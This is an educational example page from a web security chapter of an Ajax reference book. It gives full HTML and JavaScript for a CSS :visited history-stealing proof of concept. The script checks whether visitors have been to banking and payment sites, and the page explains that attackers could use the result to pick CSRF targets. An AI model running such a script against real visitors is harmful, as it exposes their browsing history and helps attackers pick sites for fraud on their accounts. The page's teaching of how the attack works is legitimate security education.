Skip to content

banner ajax
The Complete Reference: Ajax

Examples: History Stealing

Stealing History with JavaScript and CSS



We will check for history of the following sites:
  • http://www.google.com/
  • https://ajaxref.com/ch7/history.html
  • https://www.wellsfargo.com/
  • http://www.bankofamerica.com/
  • http://www.washingtonmutual.com/
  • http://www.amazon.com/
  • https://home.americanexpress.com/
  • https://www.paypal.com/





  • Scenarios

    An evil site or an XSS compromised site may contain this history checking script to see if you have been to sites that interest them. They will then use a CSRF to attempt to perform some action at that site as you if you are still authenticated via a cookie.

    Note: The example only checks for a few sites but it could check quite a number in a very short time or use a communications request to fetch the list of sites or URLs it is interested in checking for.

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Chapter 7 : Security - History</title>
    <link rel="stylesheet" href="https://ajaxref.com/ch7/global.css" type="text/css" media="screen" />
    <style type="text/css">
     
        a.stealhistory:link{color:#FF0000}
        a.stealhistory:visited{color:#00FF00}
    </style>
    <script src="https://ajaxref.com/ch7/utilities.js" type="text/javascript">
    </script>
    <script type="text/javascript">
     
     
     
    function getHistoryLength()
    {
        var responseOutput = document.getElementById("responseOutput");    
        responseOutput.innerHTML = "<strong>Length of History through Javascript: </strong>" + window.history.length;
    }
     
    function getHistory(stealhistorysites)
    {
        var responseOutput = document.getElementById("responseOutput");    
        responseOutput.innerHTML = "<strong>Checking History through Javascript/CSS. </strong><br />";
        responseOutput.innerHTML += "<br /><strong>You have been to: </strong><br />";
        for (var i=0;i<stealhistorysites.length;i++)
        {
            if (checkHistory(stealhistorysites[i]))
                responseOutput.innerHTML += stealhistorysites[i] + "<br />";
        } 
    }
     
    function checkHistory(url) 
    {
        var found = false;
        var link = document.createElement("a");
        link.className = "stealhistory";       
        link.href = url;       
        link.appendChild(document.createTextNode("stealhistory"));
        link.style.visibility = "hidden";              
        document.body.appendChild(link); 
              
        var color = getStyle(link,"color").toLowerCase();      
        document.body.removeChild(link);       
        if(color == "rgb(0, 255, 0)" || color == "#00ff00")           
            found = true;
        
        return found;
    }
     
    window.onload = function() 
    { 
        /* obviously this is hardcoded but we could easily ask for a set of things to check for via a remote communication request */
        var stealhistorysites = new Array("http://www.google.com/", "https://ajaxref.com/ch7/history.html", "https://www.wellsfargo.com/", "http://www.bankofamerica.com/", "http://www.washingtonmutual.com/", "http://www.amazon.com/", "https://home.americanexpress.com/", "https://www.paypal.com/");
        
        document.requestForm.checkHistoryLength.onclick=function(){getHistoryLength();};
        document.requestForm.checkVisited.onclick=function(){getHistory(stealhistorysites);};
        
        var websites = document.getElementById("websites");
        websites.innerHTML = "<strong>We will check for history of the following sites:</strong><ul>";
        for (var i=0;i<stealhistorysites.length;i++)
            websites.innerHTML += "<li>" + stealhistorysites[i] + "</li>";
        websites.innerHTML += "</ul><br />";
            
        
    }
    </script>
     
    </head>
    <body>
    <div class="content">
    <h1>Stealing History with JavaScript and CSS</h1><br />
    <form action="#" name="requestForm">
        <input type="button" value="Check History Length" name="checkHistoryLength" />
        <input type="button" value="Check for Visited URLs" name="checkVisited"  />
    </form>
    </div>
     
    <br />
    <div id="websites" class="response"></div>
    <br /><br />
    <div id="responseOutput" class="response"></div>
     
    <br /><br />
    <div id="scenarios">
        <h3>Scenarios</h3>
        <p>An evil site or an XSS compromised site may contain this history checking script to see if you have been to sites that interest them.  They will then use a CSRF to attempt to perform some action at that site as you if you are still authenticated via a cookie.</p>
        <p><em>Note:</em> The example only checks for a few sites but it could check quite a number in a very short time or use a communications request to fetch the list of sites or URLs it is interested in checking for.</p>
    </div>
    </body>
    </html>